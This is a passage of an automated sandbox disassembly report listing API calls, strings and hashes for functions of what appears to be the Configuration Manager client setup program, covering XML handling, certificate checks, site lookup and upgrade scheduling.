                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005B745F: __EH_prolog3_catch.LIBCMT ref: 005B7466
                                                                                            • Part of subcall function 005B745F: GetCurrentThreadId.KERNEL32 ref: 005B74E0
                                                                                          Strings
                                                                                          • <UpgradeSchedule Value="%s"/>, xrefs: 005CB4BC
                                                                                          • <SourceLocation Value="%s"/>, xrefs: 005CB535
                                                                                          • <SourceType Value="%s"/>, xrefs: 005CB502
                                                                                          • <Packages>%s</Packages>, xrefs: 005CB49D
                                                                                          • <DeploymentMethod Value="%u"/>, xrefs: 005CB567
                                                                                          • <ClientDeploymentMessage ErrorCode="%d">%s%s%s</ClientDeploymentMessage>, xrefs: 005CB615
                                                                                          • <Package ID="%s"/>, xrefs: 005CB44F
                                                                                          • SMB, xrefs: 005CB4F9
                                                                                          • <Additional>%s</Additional>, xrefs: 005CB5E4
                                                                                          • <AlwaysExcludeUpgrade Value="%s"/>, xrefs: 005CB5AE
                                                                                          • <Client Baseline="%d" BaselineCookie="%s" Platform="%d" Langs="%s"/>, xrefs: 005CB405
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_H_prolog3_catchThread
                                                                                          • String ID: <Additional>%s</Additional>$<AlwaysExcludeUpgrade Value="%s"/>$<Client Baseline="%d" BaselineCookie="%s" Platform="%d" Langs="%s"/>$<ClientDeploymentMessage ErrorCode="%d">%s%s%s</ClientDeploymentMessage>$<DeploymentMethod Value="%u"/>$<Package ID="%s"/>$<Packages>%s</Packages>$<SourceLocation Value="%s"/>$<SourceType Value="%s"/>$<UpgradeSchedule Value="%s"/>$SMB
                                                                                          • API String ID: 2262774848-190567240
                                                                                          • Opcode ID: 8c047008ae8aa3b4cdee620c4691c0b0bec964491f0bc94eb2829c17c786e9eb
                                                                                          • Instruction ID: 2d91e14b8905509ec9db29ada8979bc7256f50a8f1576d50744d5d0945f5574a
                                                                                          • Opcode Fuzzy Hash: 8c047008ae8aa3b4cdee620c4691c0b0bec964491f0bc94eb2829c17c786e9eb
                                                                                          • Instruction Fuzzy Hash: 6DB19C71A01219EFDF14DFA4C88AFEEBF7ABF51300F040459E605AB142EB349A45CB91
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005A0C32: __EH_prolog3_GS.LIBCMT ref: 005A0C39
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F556D
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_H_prolog3_catch_
                                                                                          • String ID: !sTempString.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$CCM::Utility::String::find_no_case$pszSearchStr && *pszSearchStr
                                                                                          • API String ID: 1942081746-1650541151
                                                                                          • Opcode ID: b9c4b44051594ec19cb2628b45c9573925ee503883bd236b76271c5ad2d927ba
                                                                                          • Instruction ID: f2d02b4d5cd913d10789d9ccc88dcb87b5e06ccb2d60fa5d6386d86e6137d60e
                                                                                          • Opcode Fuzzy Hash: b9c4b44051594ec19cb2628b45c9573925ee503883bd236b76271c5ad2d927ba
                                                                                          • Instruction Fuzzy Hash: 675189B0D45358EADF10EBA8D94AAEDBFB5BF55310F24810AF214B72C1E7781A05CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B1043
                                                                                            • Part of subcall function 005AA097: __EH_prolog3_catch.LIBCMT ref: 005AA09E
                                                                                            • Part of subcall function 005AA097: GetCurrentThreadId.KERNEL32 ref: 005AA11B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B109C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B10FE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B1169
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B11BA
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::XML::Document::loadFromXML$SetMaxXmlSize(nMaxSize)$X:\bt\1024777\repo\src\common\inc\ccmxml.h$bSuccess == ((VARIANT_BOOL)-1)$createNewDocument()$getPointer()->loadXML(CCM::Utility::BString(pszXML), &bSuccess)
                                                                                          • API String ID: 3454896115-989401391
                                                                                          • Opcode ID: 776994124b8a619c34991b761aa0b684b089e7d356ae866a57261eb20ea9471a
                                                                                          • Instruction ID: 3797cb5ffed6be6d764036dfb42e281ee162291488ca69c883f76b36958cbc6e
                                                                                          • Opcode Fuzzy Hash: 776994124b8a619c34991b761aa0b684b089e7d356ae866a57261eb20ea9471a
                                                                                          • Instruction Fuzzy Hash: B9412B71E80649ABCB10ABA58D1AFFE7E26FF82B50F184109FA047B2C1C7745B01D799
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061501B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00615096
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00615100
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006150FB
                                                                                          • spService->QueryInterface(&spCcmResources), xrefs: 006150F6
                                                                                          • ..\CcmConditions.cpp, xrefs: 0061509F
                                                                                          • CCMGetGlobalService(&spService), xrefs: 0061508C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00615091
                                                                                          • CCM::Utility::CcmGetNetworkState, xrefs: 0061504E
                                                                                          • ..\CcmConditions.cpp, xrefs: 00615109
                                                                                          • ..\CcmConditions.cpp, xrefs: 00615086
                                                                                          • ..\CcmConditions.cpp, xrefs: 006150F0
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$CCM::Utility::CcmGetNetworkState$CCMGetGlobalService(&spService)$spService->QueryInterface(&spCcmResources)
                                                                                          • API String ID: 3454896115-180528593
                                                                                          • Opcode ID: 2b4f469b2f9c63ba90455d755637c88b19c155fc65c18c396e3d8b0482353f6e
                                                                                          • Instruction ID: 19b32b4be1ef4bc019ede36b27532220b0a69dd940af21f383a96446d2a2fc3e
                                                                                          • Opcode Fuzzy Hash: 2b4f469b2f9c63ba90455d755637c88b19c155fc65c18c396e3d8b0482353f6e
                                                                                          • Instruction Fuzzy Hash: D3418FB1D40759EBCF21DFA4C84ABEDBBB5AF95700F188049E541BB381C7B84A458B91
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006151BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00615263
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006152C1
                                                                                          Strings
                                                                                          • spService->QueryInterface(&spCcmResources), xrefs: 006152B7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006152BC
                                                                                          • ..\CcmConditions.cpp, xrefs: 00615253
                                                                                          • CCMGetGlobalService(&spService), xrefs: 00615259
                                                                                          • ..\CcmConditions.cpp, xrefs: 006152C9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061525E
                                                                                          • CCM::Utility::CcmIsInConnectedStandby, xrefs: 006151ED
                                                                                          • ..\CcmConditions.cpp, xrefs: 006152B1
                                                                                          • ..\CcmConditions.cpp, xrefs: 0061526B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$..\CcmConditions.cpp$CCM::Utility::CcmIsInConnectedStandby$CCMGetGlobalService(&spService)$spService->QueryInterface(&spCcmResources)
                                                                                          • API String ID: 3454896115-222789738
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0063412F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006341DB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00634279
                                                                                          Strings
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 006341E7
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 006341CB
                                                                                          • (g_pBCryptLib = new BCryptLib()) != 0, xrefs: 0063426F
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 00634285
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006341D6
                                                                                          • (g_pNCryptLib = new NCryptLib()) != 0, xrefs: 006341D1
                                                                                          • CcmUtilLib::CcmLoadCNG_Globals, xrefs: 00634139
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634274
                                                                                          • ..\CcmCryptoUtil.cpp, xrefs: 00634269
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(g_pBCryptLib = new BCryptLib()) != 0$(g_pNCryptLib = new NCryptLib()) != 0$..\CcmCryptoUtil.cpp$..\CcmCryptoUtil.cpp$..\CcmCryptoUtil.cpp$..\CcmCryptoUtil.cpp$CcmUtilLib::CcmLoadCNG_Globals
                                                                                          • API String ID: 3454896115-3117264267
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B245F
                                                                                          • CoCreateInstance.OLE32(00703398,00000000,00000001,007033A8,?,CCM::Utility::CcmGetNoReadLockContext,00000020,00643C58,00000000), ref: 005B2496
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B24C7
                                                                                          • VariantInit.OLEAUT32(?), ref: 005B24F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B254E
                                                                                          • VariantClear.OLEAUT32(?), ref: 005B2598
                                                                                          Similarity
                                                                                          • API ID: CurrentThreadVariant$ClearCreateH_prolog3_catchInitInstance
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(*ppContext)->SetValue(szNoLock, 0, &vtNoLock)$CCM::Utility::CcmGetNoReadLockContext$CcmNoReadLock$CoCreateInstance( CLSID_WbemContext, 0, CLSCTX_INPROC_SERVER, IID_IWbemContext, (void**)ppContext )$X:\bt\1024777\repo\src\common\inc\ccmutil.h
                                                                                          • API String ID: 1698760410-4043095203
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00626341
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006263AF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062641B
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00626416
                                                                                          • 0 != pCertContext, xrefs: 006263A5
                                                                                          • ..\CcmCert.cpp, xrefs: 0062639F
                                                                                          • VerifyCertificateChain( pCertContext, dwChainFlags, pszPolicyOID, dwPolicyFlags, hChainEngine, pSmsCtlContext, sRootHash ), xrefs: 00626411
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006263AA
                                                                                          • ..\CcmCert.cpp, xrefs: 006263B7
                                                                                          • ..\CcmCert.cpp, xrefs: 00626423
                                                                                          • ..\CcmCert.cpp, xrefs: 0062640B
                                                                                          • CcmUtilLib::CcmVerifyCertificateChain, xrefs: 00626369
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$CcmUtilLib::CcmVerifyCertificateChain$VerifyCertificateChain( pCertContext, dwChainFlags, pszPolicyOID, dwPolicyFlags, hChainEngine, pSmsCtlContext, sRootHash )
                                                                                          • API String ID: 3353525418-1028597874
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058C036
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C1CC
                                                                                            • Part of subcall function 005A1CAB: __EH_prolog3_GS.LIBCMT ref: 005A1CB2
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Skip getting site version because client deployment is from OSD with auto sitecode., xrefs: 0058C0DB
                                                                                          • AUTO, xrefs: 0058C09D
                                                                                          • CcmSetup::GetSiteCodeAndVersion, xrefs: 0058C042
                                                                                          • ccmsetup.cpp, xrefs: 0058C1BC
                                                                                          • GetSiteVersion( m_sSiteCode, m_oMPs, m_sSiteVersion ), xrefs: 0058C1C2
                                                                                          • SMSSITECODE, xrefs: 0058C066
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C1C7
                                                                                          • Got site code '%s' from AD., xrefs: 0058C157
                                                                                          • ccmsetup.cpp, xrefs: 0058C1D4
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$AUTO$CcmSetup::GetSiteCodeAndVersion$GetSiteVersion( m_sSiteCode, m_oMPs, m_sSiteVersion )$Got site code '%s' from AD.$SMSSITECODE$Skip getting site version because client deployment is from OSD with auto sitecode.$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1942081746-4160097864
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A7034
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A70F1
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetupManifest::GetClientVersion$H&l$Item[@FileName='%s']$Version$i386/client.msi$m_spManifest.selectNode(sQuery.c_str(), &spClientMsi)$manifest.cpp$manifest.cpp
                                                                                          • API String ID: 1325713246-201183930
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005EF1F5
                                                                                          • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,00000004,00000000), ref: 005EF284
                                                                                          • GetLastError.KERNEL32 ref: 005EF28E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF2C7
                                                                                          • WinHttpQueryHeaders.WINHTTP(00000000,00000014,00000000,?,00000200,00000000), ref: 005EF310
                                                                                          Strings
                                                                                          • ..\ccmhttperror.cpp, xrefs: 005EF2B7
                                                                                          • CCMHttpGetResponseStatus, xrefs: 005EF232
                                                                                          • ..\ccmhttperror.cpp, xrefs: 005EF2CF
                                                                                          • <none>, xrefs: 005EF255
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005EF2C2
                                                                                          • WinHttpQueryHeaders( hRequest, 19 | 0x20000000, 0, pdwStatusCode, &dwSize, 0 ), xrefs: 005EF2BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Similarity
                                                                                          • API ID: HeadersHttpQuery$CurrentErrorH_prolog3_catch_LastThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\ccmhttperror.cpp$..\ccmhttperror.cpp$<none>$CCMHttpGetResponseStatus$WinHttpQueryHeaders( hRequest, 19 | 0x20000000, 0, pdwStatusCode, &dwSize, 0 )
                                                                                          • API String ID: 2782417961-2339376986
                                                                                          • Opcode ID: f1a11a2ec66d7c7fe8bee23a62579ec9119c9c2955e815f1588dcd9ff2c34df7
                                                                                          • Instruction ID: ac4039e96caff6bedae7a5c4524a37f0a32c1986653176611791304cfbbd3185
                                                                                          • Opcode Fuzzy Hash: f1a11a2ec66d7c7fe8bee23a62579ec9119c9c2955e815f1588dcd9ff2c34df7
                                                                                          • Instruction Fuzzy Hash: 4031B771A8125DBBDB20EFA59C4DFDE7AB9BF54710F000095F648A7191DB345A80CBA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005880E1
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                          • lstrlenW.KERNEL32(00000008,00000008,000000E8,00588086,00000000,00000000,?,?,?,?,00000001,00000000,00000001,00000000,00000000,?), ref: 0058813B
                                                                                            • Part of subcall function 005F53EA: __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005881D6
                                                                                          • lstrlenW.KERNEL32(/CCM_Client,000000FF,/CCM_Client,00000000,?,?,00000001,?,?,CcmSetup::GetClientOptionalFilesHttp,00000008,000000E8,00588086,00000000,00000000,?), ref: 005883D9
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 005881E2
                                                                                          • CWinHttpHelper::GetDirectoryList_HTTP( sSearchURL, szDPTokenAuth, true, sslCertAuthResult, arrTemp ), xrefs: 005881CC
                                                                                          • CcmSetup::GetClientOptionalFilesHttp, xrefs: 00588159
                                                                                          • /CCM_Client, xrefs: 005883AF, 005883D4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005881D1
                                                                                          • ccmsetup.cpp, xrefs: 005881C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Threadlstrlen$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$/CCM_Client$CWinHttpHelper::GetDirectoryList_HTTP( sSearchURL, szDPTokenAuth, true, sslCertAuthResult, arrTemp )$CcmSetup::GetClientOptionalFilesHttp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 637005874-1542729405
                                                                                          • Opcode ID: c20367e5ae56a0be6bc18048be077850a19350960c2138ce403adae0707f9e0f
                                                                                          • Instruction ID: cf1c158de436a6754911deed4590ae67b9412e33ab61e7f5d85dc8e1e53812ba
                                                                                          • Opcode Fuzzy Hash: c20367e5ae56a0be6bc18048be077850a19350960c2138ce403adae0707f9e0f
                                                                                          • Instruction Fuzzy Hash: F3A19E71904299EADF21EBA4CD49BEEBEB8BF51304F108599E405B3282CB745E45CB21
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057C07A
                                                                                          • GetFileAttributesW.KERNEL32(00000000,?,?,006A17D4,?,CcmSetup::CheckForAvailableSources,00000058), ref: 0057C123
                                                                                          • GetLastError.KERNEL32 ref: 0057C18D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C201
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: AttributesCurrentErrorFileH_prolog3_catch_LastThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetup::CheckForAvailableSources$Source %s is inaccessible (%lu)$WaitForRunning()$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1760665454-3206596534
                                                                                          • Opcode ID: 28b207b43b34e01edd1e01f6af2aa29e512ccaa9d6bef8bbc3fa10fc040adc91
                                                                                          • Instruction ID: 7abddffa8c8414ebfea2c01deaa5280871fa3454690692499593b7e1609ead29
                                                                                          • Opcode Fuzzy Hash: 28b207b43b34e01edd1e01f6af2aa29e512ccaa9d6bef8bbc3fa10fc040adc91
                                                                                          • Instruction Fuzzy Hash: 8D519D74A04248AFDF11DFA8D889BDD7FB5BF4A310F148099F459AB282C7709D40DB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B82A9
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B838D
                                                                                            • Part of subcall function 00634BFC: __EH_prolog3_catch.LIBCMT ref: 00634C03
                                                                                            • Part of subcall function 00634BFC: _swscanf.LIBCMT ref: 00634C51
                                                                                            • Part of subcall function 00634BFC: GetCurrentThreadId.KERNEL32 ref: 00634C84
                                                                                            • Part of subcall function 00634BFC: __CxxThrowException@8.LIBCMT ref: 00634D4C
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B8388
                                                                                          • GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled, sInstalledVersion ), xrefs: 005B8383
                                                                                          • util.cpp, xrefs: 005B8395
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 005B832C
                                                                                          • IsClientInstalled, xrefs: 005B82DD
                                                                                          • util.cpp, xrefs: 005B837D
                                                                                          • An old client with version %s is detected., xrefs: 005B8412
                                                                                          • 5.00.0000.0000, xrefs: 005B82C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3H_prolog3_catchH_prolog3_catch_Throw_swscanf
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$5.00.0000.0000$An old client with version %s is detected.$GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled, sInstalledVersion )$IsClientInstalled$util.cpp$util.cpp${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 4113126383-792981583
                                                                                          • Opcode ID: 4d1fb76c979d2dfc7705189a6c307b8b76dff32e712f808a3b18ef75c1d2e3ea
                                                                                          • Instruction ID: 88a6c972bc82ab9399d7eaaabe316b36beae0cc81476a664561df66fd4c5c71d
                                                                                          • Opcode Fuzzy Hash: 4d1fb76c979d2dfc7705189a6c307b8b76dff32e712f808a3b18ef75c1d2e3ea
                                                                                          • Instruction Fuzzy Hash: 6451C171D09389EADF11DBA8C949BEDBFB9AF55304F24904AE48077242CB742A48DB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005AA3D8
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA471
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA4FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::XML::Node::getAttribute$H&l$X:\bt\1024777\repo\src\common\inc\ccmxml.h$getAttributes(&spAttribs)$spAttrib.getText(sValue)$spAttribs->getNamedItem( CCM::Utility::BString(pszName), &spAttrib )
                                                                                          • API String ID: 981364226-144156922
                                                                                          • Opcode ID: b3c7b6ce46be13938de9a8cb7223b43d141559c4af114771d1f79ae5c7093927
                                                                                          • Instruction ID: 5cdd2d9c8efdc3083e148934ea2d2d0c249313e69033c504cb8aca13deadfa8c
                                                                                          • Opcode Fuzzy Hash: b3c7b6ce46be13938de9a8cb7223b43d141559c4af114771d1f79ae5c7093927
                                                                                          • Instruction Fuzzy Hash: 8051B070C4024AEBDF11EBA4C94ABEEBF75BF5A714F148048F9017B282C7745A05CBA6
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060A333
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060A38E
                                                                                            • Part of subcall function 00609505: VariantClear.OLEAUT32(?), ref: 00609512
                                                                                          Strings
                                                                                          • 0 != pDoc2, xrefs: 0060A384
                                                                                          • ..\XmlUtil.cpp, xrefs: 0060A396
                                                                                          • CCM::Utility::XML::ProhibitExternalReferences, xrefs: 0060A348
                                                                                          • XML::ProhibitExternalReferences - Failed to disable DOM external references (0x%08x) - sufficient MSXML version(s) may not be pres, xrefs: 0060A4B5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060A389
                                                                                          • lu, xrefs: 0060A4A6
                                                                                          • ..\XmlUtil.cpp, xrefs: 0060A37E
                                                                                          • ProhibitDTD, xrefs: 0060A405
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ClearCurrentH_prolog3H_prolog3_catchThreadVariant
                                                                                          • String ID: lu$%s, HRESULT=%08lx (%s,%lu)$..\XmlUtil.cpp$..\XmlUtil.cpp$0 != pDoc2$CCM::Utility::XML::ProhibitExternalReferences$ProhibitDTD$XML::ProhibitExternalReferences - Failed to disable DOM external references (0x%08x) - sufficient MSXML version(s) may not be pres
                                                                                          • API String ID: 132144479-694110910
                                                                                          • Opcode ID: 914b53bd3481cfb4ddb027354f2b097bfa01de5456e443eaf7fe4e0e61563b19
                                                                                          • Instruction ID: c5e9cd3824a056f511241c6979e2c41500d024da5269f397bc0e1d378d4d1c50
                                                                                          • Opcode Fuzzy Hash: 914b53bd3481cfb4ddb027354f2b097bfa01de5456e443eaf7fe4e0e61563b19
                                                                                          • Instruction Fuzzy Hash: 8141F371D813599ADB09EBE4C90A7EEBFA26F51740F048048E9447B3C2D7F91A08C7A2
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005C6482
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 005C8CCB: __EH_prolog3_GS.LIBCMT ref: 005C8CD2
                                                                                            • Part of subcall function 005C8CCB: FileTimeToSystemTime.KERNEL32(?,?,?,?,00000060,005C6516,00000000,?,CreateUpgradeWinSchedTask,00000001,00000000,00000001,00000000,?,00000000,/UpgradeWinTask), ref: 005C8D1D
                                                                                            • Part of subcall function 005B80F5: __EH_prolog3_GS.LIBCMT ref: 005B80FC
                                                                                            • Part of subcall function 005B80F5: GetTickCount.KERNEL32 ref: 005B8101
                                                                                            • Part of subcall function 005B80F5: GetCurrentThreadId.KERNEL32 ref: 005B8152
                                                                                            • Part of subcall function 005B80F5: CoCreateGuid.OLE32(?,?), ref: 005B8186
                                                                                          • _rand.LIBCMT ref: 005C651D
                                                                                            • Part of subcall function 005C65E4: __EH_prolog3_catch_GS.LIBCMT ref: 005C65EE
                                                                                            • Part of subcall function 005C65E4: GetCurrentThreadId.KERNEL32 ref: 005C6696
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C6565
                                                                                          Strings
                                                                                          • CreateWinSchedTask(c_szCcmSetupWinTaskName, sArguments, iDelayMinutes, sScheduledTimeUtc), xrefs: 005C655B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C6560
                                                                                          • /UpgradeWinTask, xrefs: 005C64B6
                                                                                          • wintask.cpp, xrefs: 005C6555
                                                                                          • Configuration Manager Client Upgrade Task, xrefs: 005C6531
